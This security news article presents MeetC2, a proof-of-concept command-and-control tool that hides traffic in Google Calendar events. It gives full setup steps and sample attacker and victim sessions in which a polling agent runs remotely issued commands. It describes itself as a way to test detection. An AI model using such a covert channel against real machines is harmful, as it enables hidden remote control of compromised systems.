MeetC2 is a PoC C2 tool using Google Calendar to mimic cloud abuse, helping teams test detection, logging, and response.
Background: Modern adversaries increasingly hide command-and-control (C2) traffic inside cloud services. We built this proof of concept (PoC) to study and demonstrate those techniques in a controlled way, emulating those tactics so red and blue teams can exercise detection, telemetry, and response to cloud abuse scenarios.
Storytime: During an internal purple-team exercise, we saw how easily traffic to trusted SaaS domains slipped. We built a lightweight, cross‑platform PoC that uses Google Calendar, giving teams a reproducible way to validate detections, logging, and third‑party app governance for cloud‑abuse C2 in a controlled environment.
MeetC2: MeetC2 is a proof-of-concept C2 framework that uses the Google Calendar API as a covert communication channel between operators and a compromised system.
Overview
MeetC2, a.k.a. MeetingC2, is a cross-platform (macOS/Linux) application that demonstrates how legitimate cloud services can be abused for adversarial operations. By using Google Calendar APIs, the framework creates a hidden communication channel that blends in with normal business traffic.
Domains utilised here are “oauth2.googleapis.com” & “www.googleapis.com“. Once authenticated, the agent enters a polling loop, sending GET requests every 30 seconds to “www.googleapis.com/calendar/v3/calendars/{calendarId}/events” to check for new calendar events containing commands.
When the organiser wants to issue a new command, they can POST a new event to the same Calendar API endpoint via “organiser” agent with the command embedded in the event’s summary field, like “Meeting from nobody: [COMMAND]”.
The “guest” agent identifies these command events during its regular polling, which extracts and executes the command locally, then updates the same event via a PUT request to include the command output within the [OUTPUT] [/OUTPUT] parameter in the description field.
Google Calendar Setup
- Navigate to the URL Google cloud console, sign in with your Google account. Select a project or create a new project.
- Navigate to “APIs & Services” → Click “Library”, in the search box, look for Google Calendar API and click “ENABLED”, it will take 20–30 seconds to get it enabled in your project.
- Post this, navigate to “APIs & Services” → “Credentials” and click “+ CREATE CREDENTIALS” at the top. Choose “Service account”, fill in the required details, i.e., Service account name: calendar-invite, Description: Syncs calendar events and continue. Skip the optional role/users and click “DONE”.
- Now check your service account lists, and you should have an email like “[email protected]”. Go to the “KEYS” section “ADD KEY” → “Create new key”, choose the “JSON” format and download the “KEY”. Rename the downloaded JSON file to credentials.json for later use.
- Navigate to the URL “https://calendar.google.com”, on the left side, find “Other calendars” → Click the “+” click on create new calendar, fill in the name/description. Post that, click on the 3 dots next to it → “Settings and sharing”. Scroll down to “Integrate calendar”, check for “Calendar ID” it should look like “[email protected]”.
- Final steps, under calendar settings, find “Share with specific people” click on “+ Add people”, add the service account email from step 4 above (the one ending in @your-project.iam.gserviceaccount.com). Change the permission to “Make changes to events” and click “Send”, and you are all set.
Command Line
Compile:
./build-all.sh <credentials.json> <calendar_id>
Attacker host:
bash-3.2$ ./organizer credentials.json [NAME]@group.calendar.google.com
MeetC2 Organizer
Commands:
exec <cmd> — Execute on all hosts
exec @host:<cmd> — Execute on specific host
exec @*:<cmd> — Execute on all hosts (explicit)
list — List recent commands
get <event_id> — Get command output
clear — Clear executed events
exit — Exit organizer
— — — — — — — — — — — — — — — — — — — —
> exec whoami
Command created for all hosts: qfj4tt8a4uoi8p7cd3b8t31337
>
>
Victim host:
bash-3.2$ ./guest-darwin-arm64
16:08:04 MeetC2 Guest started on dhirajmishra
16:08:04 Calendar ID: [NAME]@group.calendar.google.com
16:08:04 Polling every 10 seconds…
16:08:15 Executing command: whoami
16:08:16 Successfully updated event with output
Acknowledgements: This project was inspired by the GC2-sheet author LooCiprian. Hence, special thanks to him.
OpSec: While this is functional, I know there are improvements in OpSec specifically for the “guest” binary. Hence, please use a test GCP project for such a setup, which should be purged later.
Download MeetC2
https://github.com/deriv-security/MeetC2
About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
Pierluigi Paganini
(SecurityAffairs – hacking, MeetC2)
